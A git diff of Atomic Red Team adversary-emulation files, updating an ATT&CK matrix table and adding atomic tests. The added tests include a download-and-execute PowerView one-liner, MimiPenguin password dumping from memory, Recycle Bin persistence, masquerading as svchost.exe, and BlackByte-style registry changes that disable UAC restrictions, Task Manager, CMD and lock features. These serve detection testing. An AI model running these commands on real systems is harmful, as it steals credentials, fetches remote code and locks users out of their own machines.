+| [Spearphishing Attachment](../../T1566.001/T1566.001.md) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | [File and Directory Discovery](../../T1083/T1083.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Cloud Accounts](../../T1078.004/T1078.004.md) | [DCSync](../../T1003.006/T1003.006.md) | Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
 | Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Launchctl](../../T1569.001/T1569.001.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Local Account](../../T1087.001/T1087.001.md) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Duplication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Internal Defacement](../../T1491.001/T1491.001.md) |
 | Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Launchd](../../T1053.004/T1053.004.md) | [Browser Extensions](../../T1176/T1176.md) | [Cloud Accounts](../../T1078.004/T1078.004.md) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Local Groups](../../T1069.001/T1069.001.md) | Shared Webroot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
@@ -11,7 +11,7 @@
 | [External Remote Services](../../T1133/T1133.md) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [CMSTP](../../T1218.003/T1218.003.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [File and Directory Discovery](../../T1083/T1083.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Authentication Package](../../T1547.002/T1547.002.md) | [At (Windows)](../../T1053.002/T1053.002.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | [Local Accounts](../../T1078.003/T1078.003.md) | [Malicious File](../../T1204.002/T1204.002.md) | [BITS Jobs](../../T1197/T1197.md) | [Authentication Package](../../T1547.002/T1547.002.md) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | [Local Account](../../T1087.001/T1087.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | [DCSync](../../T1003.006/T1003.006.md) | [Local Groups](../../T1069.001/T1069.001.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Web Service](../../T1567/T1567.md) | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | [DCSync](../../T1003.006/T1003.006.md) | [Local Groups](../../T1069.001/T1069.001.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Web Service](../../T1567/T1567.md) | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | [Replication Through Removable Media](../../T1091/T1091.md) | [Native API](../../T1106/T1106.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Scanning](../../T1046/T1046.md) | [Replication Through Removable Media](../../T1091/T1091.md) | Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [PowerShell](../../T1059.001/T1059.001.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Share Discovery](../../T1135/T1135.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | [Forced Authentication](../../T1187/T1187.md) | [Network Sniffing](../../T1040/T1040.md) | Shared Webroot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
@@ -60,7 +60,7 @@
 |  |  | Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | [Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) |  |  |  |  |  |  |  |
 |  |  | Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) |  |  |  |  |  |  |  |
 |  |  | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Masquerading](../../T1036/T1036.md) |  |  |  |  |  |  |  |
-|  |  | SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Shortcut Modification](../../T1547.009/T1547.009.md) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  | SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Shortcut Modification](../../T1547.009/T1547.009.md) | [Match Legitimate Name or Location](../../T1036.005/T1036.005.md) |  |  |  |  |  |  |  |
 |  |  | [Scheduled Task](../../T1053.005/T1053.005.md) | Thread Execution Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Registry](../../T1112/T1112.md) |  |  |  |  |  |  |  |
 |  |  | [Screensaver](../../T1546.002/T1546.002.md) | Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Mshta](../../T1218.005/T1218.005.md) |  |  |  |  |  |  |  |
@@ -341,6 +341,20 @@ credential-access:
 '
        name: powershell
        elevation_required: false
+    - name: Get-DomainUser with PowerView
+      auto_generated_guid: d6139549-7b72-4e48-9ea1-324fc9bdf88a
+      description: 'Utilizing PowerView, run Get-DomainUser to identify domain users.
+        Upon execution, progress and info about users within the domain being scanned
+        will be displayed.
+
+'
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose
+        name: powershell
  T1552.003:
    technique:
      external_references:
@@ -6299,6 +6313,73 @@ credential-access:
        cleanup_command: 'rm -f "#{output_file}"

 '
+    - name: Capture Passwords with MimiPenguin
+      auto_generated_guid: a27418de-bdce-4ebd-b655-38f04842bf0c
+      description: "MimiPenguin is a tool inspired by MimiKatz that targets Linux
+        systems affected by CVE-2018-20781 (Ubuntu-based distros and certain versions
+        of GNOME Keyring). \nUpon successful execution on an affected system, MimiPenguin
+        will retrieve passwords from memory and output them to a specified file. \nSee
+        https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781. \nSee https://www.tecmint.com/mimipenguin-hack-login-passwords-of-linux-users/#:~:text=Mimipenguin%20is%20a%20free%20and,tested%20on%20various%20Linux%20distributions.\n"
+      supported_platforms:
+      - linux
+      input_arguments:
+        output_file:
+          description: Path where captured results will be placed
+          type: Path
+          default: "/tmp/T1003.007Test3.txt"
+        MimiPenguin_Location:
+          description: Path of MimiPenguin script
+          type: Path
+          default: "/tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh"
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'MimiPenguin script must exist on disk at specified location
+          (#{MimiPenguin_Location})
+
+'
+        prereq_command: 'if [ -f "#{MimiPenguin_Location}" ]; then exit 0; else exit
+          1; fi;
+
+'
+        get_prereq_command: |
+          wget -O "/tmp/mimipenguin.tar.gz" https://github.com/huntergregal/mimipenguin/releases/download/2.0-release/mimipenguin_2.0-release.tar.gz
+          mkdir /tmp/mimipenguin
+          tar -xzvf "/tmp/mimipenguin.tar.gz" -C /tmp/mimipenguin
+      - description: 'Strings must be installed
+
+'
+        prereq_command: 'if [ -x "$(command -v strings --version)" ]; then exit 0;
+          else exit 1; fi;
+
+'
+        get_prereq_command: 'sudo apt-get -y install binutils
+
+'
+      - description: 'Python2 must be installed
+
+'
+        prereq_command: 'if [ -x "$(command -v python2 --version)" ]; then exit 0;
+          else exit 1; fi;
+
+'
+        get_prereq_command: "sudo apt-get -y install python2       \n"
+      - description: 'Libc-bin must be installed
+
+'
+        prereq_command: 'if [ -x "$(command -v ldd --version)" ]; then exit 0; else
+          exit 1; fi;
+
+'
+        get_prereq_command: "sudo apt-get -y install libc-bin        \n"
+      executor:
+        command: |
+          sudo #{MimiPenguin_Location} > #{output_file}
+          cat #{output_file}
+        cleanup_command: 'rm -f #{output_file} > /dev/null
+
+'
+        name: bash
+        elevation_required: true
  T1606.002:
    technique:
      external_references:
@@ -10171,7 +10252,7 @@ collection:
          1; fi

 '
-        get_prereq_command: 'sudo apt-get -y install graphicsmagick-imagemagick-compat
+        get_prereq_command: 'sudo apt install graphicsmagick-imagemagick-compat

 '
      executor:
@@ -11604,7 +11685,25 @@ privilege-escalation:
      - 'Kernel: Kernel Module Load'
      - 'Driver: Driver Load'
      - 'Process: OS API Execution'
-    atomic_tests: []
+      identifier: T1547
+    atomic_tests:
+    - name: Add a driver
+      auto_generated_guid: cb01b3da-b0e7-4e24-bf6d-de5223526785
+      description: 'Install a driver via pnputil.exe lolbin
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        driver_inf:
+          description: A built-in, already installed windows driver inf
+          type: Path
+          default: C:\Windows\INF\usbstor.inf
+      executor:
+        command: 'pnputil.exe /add-driver "#{driver_inf}"
+
+'
+        name: command_prompt
  T1037:
    technique:
      id: attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334
@@ -18119,6 +18218,19 @@ privilege-escalation:
          Menu\Programs\Startup\calc_exe.lnk" -ErrorAction Ignore
        name: powershell
        elevation_required: true
+    - name: Add persistance via Recycle bin
+      auto_generated_guid: bda6a3d6-7aa7-4e89-908b-306772e9662f
+      description: |
+        Add a persistance via Recycle bin [vxunderground](https://github.com/vxunderground/VXUG-Papers/blob/main/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf)
+        User have to clic on the recycle bin to lauch the payload (here calc)
+      supported_platforms:
+      - windows
+      executor:
+        command: reg ADD "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command"
+          /ve /d "calc.exe" /f
+        cleanup_command: reg DELETE "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open"
+          /f
+        name: command_prompt
  T1134.005:
    technique:
      external_references:
@@ -31192,6 +31304,36 @@ defense-evasion:
        cleanup_command: |
          rm -f $HOME/.../sh
          rmdir $HOME/.../
+    - name: Masquerade as a built-in system executable
+      auto_generated_guid: 35eb8d16-9820-4423-a2a1-90c4f5edd9ca
+      description: 'Launch an executable that attempts to masquerade as a legitimate
+        executable.
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        executable_filepath:
+          description: File path where the generated executable will be dropped and
+            executed from. The filename should be the name of a built-in system utility.
+          type: String
+          default: "$Env:windir\\Temp\\svchost.exe"
+      executor:
+        command: |
+          Add-Type -TypeDefinition @'
+          public class Test {
+              public static void Main(string[] args) {
+                  System.Console.WriteLine("tweet, tweet");
+              }
+          }
+          '@ -OutputAssembly "#{executable_filepath}"
+
+          Start-Process -FilePath "#{executable_filepath}"
+        cleanup_command: 'Remove-Item -Path "#{executable_filepath}" -ErrorAction
+          Ignore
+
+'
+        name: powershell
  T1556:
    technique:
      external_references:
@@ -31556,9 +31698,175 @@ defense-evasion:
          cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
          cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v LongPathsEnabled /t REG_DWORD /d 1 /f
        cleanup_command: |
-          reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v LocalAccountTokenFilterPolicy /f 2>&1
-          reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLinkedConnections /f 2>&1
-          reg delete HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\ /v LongPathsEnabled /f 2>&1
+          reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v LocalAccountTokenFilterPolicy /f >nul 2>&1
+          reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLinkedConnections /f >nul 2>&1
+          reg delete HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\ /v LongPathsEnabled /f >nul 2>&1
+        name: command_prompt
+        elevation_required: true
+    - name: BlackByte Ransomware Registry Changes - Powershell
+      auto_generated_guid: 0b79c06f-c788-44a2-8630-d69051f1123d
+      description: |
+        This task recreates the steps taken by BlackByte ransomware before it worms to other machines via Powershell.  See "Preparing to Worm" section: https://redcanary.com/blog/blackbyte-ransomware/
+        The steps are as follows:
+        <ol>
+            <li>1. Elevate Local Privilege by disabling UAC Remote Restrictions</li>
+            <li>2. Enable OS to share network connections between different privilege levels</li>
+            <li>3. Enable long path values for file paths, names, and namespaces to ensure encryption of all file names and paths</li>
+        </ol>
+        The registry keys and their respective values will be created upon successful execution.
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -PropertyType DWord -Value 1 -Force
+          New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -PropertyType DWord -Value 1 -Force
+          New-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -PropertyType DWord -Value 1 -Force
+        cleanup_command: |
+          Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -Force -ErrorAction Ignore
+          Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -Force -ErrorAction Ignore
+          Remove-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -Force -ErrorAction Ignore
+        name: powershell
+        elevation_required: true
+    - name: Disable Windows Registry Tool
+      auto_generated_guid: ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8
+      description: |
+        Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows registry tool to prevent user modifying registry entry.
+        See example how Agent Tesla malware abuse this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\policies\system
+          /v DisableRegistryTools /t REG_DWORD /d 1 /f
+
+'
+        cleanup_command: 'reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\policies\system
+          /v DisableRegistryTools /f >nul 2>&1
+
+'
+        name: command_prompt
+        elevation_required: true
+    - name: Disable Windows CMD application
+      auto_generated_guid: d2561a6d-72bd-408c-b150-13efe1801c2a
+      description: |
+        Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows CMD application.
+        See example how Agent Tesla malware abuse this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System"
+          /v "DisableCMD" /t REG_DWORD /d "1" /f
+
+'
+        cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System"
+          /v "DisableCMD" /f >nul 2>&1
+
+'
+        name: command_prompt
+        elevation_required: true
+    - name: Disable Windows Task Manager application
+      auto_generated_guid: af254e70-dd0e-4de6-9afe-a994d9ea8b62
+      description: |
+        Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows task manager application.
+        See example how Agent Tesla malware abuse this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System"
+          /v DisableTaskmgr /t REG_DWORD /d 1 /f
+
+'
+        cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System"
+          /v DisableTaskmgr /f >nul 2>&1
+
+'
+        name: command_prompt
+        elevation_required: true
+    - name: Disable Windows Notification Center
+      auto_generated_guid: c0d6d67f-1f63-42cc-95c0-5fd6b20082ad
+      description: |
+        Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows notification center.
+        See how remcos rat abuse this technique- https://tccontre.blogspot.com/2020/01/remcos-rat-evading-windows-defender-av.html
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer
+          /v DisableNotificationCenter /t REG_DWORD /d 1 /f
+
+'
+        cleanup_command: 'reg delete HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer
+          /v DisableNotificationCenter /f >nul 2>&1
+
+'
+        name: command_prompt
+        elevation_required: true
+    - name: Disable Windows Shutdown Button
+      auto_generated_guid: 6e0d1131-2d7e-4905-8ca5-d6172f05d03d
+      description: |
+        Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows shutdown button.
+        See how ransomware abuse this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom.msil.screenlocker.a/
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System"
+          /v shutdownwithoutlogon /t REG_DWORD /d 0 /f
+
+'
+        cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System"
+          /v shutdownwithoutlogon /f >nul 2>&1
+
+'
+        name: command_prompt
+        elevation_required: true
+    - name: Disable Windows LogOff Button
+      auto_generated_guid: e246578a-c24d-46a7-9237-0213ff86fb0c
+      description: |
+        Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows logoff button.
+        See how ransomware abuse this technique- https://www.trendmicro.com/vinfo/be/threat-encyclopedia/search/js_noclose.e/2
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoLogOff /t REG_DWORD /d 1 /f
+          reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartMenuLogOff /t REG_DWORD /d 1 /f
+        cleanup_command: |
+          reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoLogOff /f >nul 2>&1
+          reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartMenuLogOff /f >nul 2>&1
+        name: command_prompt
+        elevation_required: true
+    - name: Disable Windows Change Password Feature
+      auto_generated_guid: d4a6da40-618f-454d-9a9e-26af552aaeb0
+      description: |
+        Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows change password feature.
+        See how ransomware abuse this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom_heartbleed.thdobah
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System"
+          /v DisableChangePassword /t REG_DWORD /d 1 /f
+
+'
+        cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System"
+          /v DisableChangePassword /f >nul 2>&1
+
+'
+        name: command_prompt
+        elevation_required: true
+    - name: Disable Windows Lock Workstation Feature
+      auto_generated_guid: 3dacb0d2-46ee-4c27-ac1b-f9886bf91a56
+      description: |
+        Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows Lock workstation feature.
+        See how ransomware abuse this technique- https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System"
+          /v DisableLockWorkstation /t REG_DWORD /d 1 /f
+
+'
+        cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System"
+          /v DisableLockWorkstation /f >nul 2>&1
+
+'
        name: command_prompt
        elevation_required: true
  T1601:
@@ -42459,7 +42767,25 @@ persistence:
      - 'Kernel: Kernel Module Load'
      - 'Driver: Driver Load'
      - 'Process: OS API Execution'
-    atomic_tests: []
+      identifier: T1547
